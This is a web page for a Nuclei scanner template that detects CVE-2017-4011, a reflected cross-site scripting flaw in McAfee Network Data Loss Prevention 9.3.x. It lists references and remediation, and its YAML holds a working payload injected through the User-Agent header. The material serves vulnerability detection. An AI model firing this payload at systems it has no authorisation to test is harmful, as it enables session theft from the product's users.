Skip to content

McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting

ID: CVE-2017-4011

Severity: medium

Author: geeknik

Tags: cve,cve2017,mcafee,xss

McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.

id: CVE-2017-4011
info:
name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
author: geeknik
severity: medium
description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
remediation: |
Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
reference:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- https://nvd.nist.gov/vuln/detail/CVE-2017-4011
- http://www.securitytracker.com/id/1038523
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-4011
cwe-id: CWE-79
epss-score: 0.00142
epss-percentile: 0.49977
cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mcafee
product: network_data_loss_prevention
tags: cve,cve2017,mcafee,xss
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
- type: word
part: header
words:
- "text/html"
# digest: 4b0a0048304602210092532f7f11ede2a7f616e16da62d93e686f3d164d079e0a99345f1fe24e73bd902210099a7bd34785836c78b8a550ddfd5c2a3a2da70adeb02f44b308a57138184cdc8:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-4011.yaml"

View on Github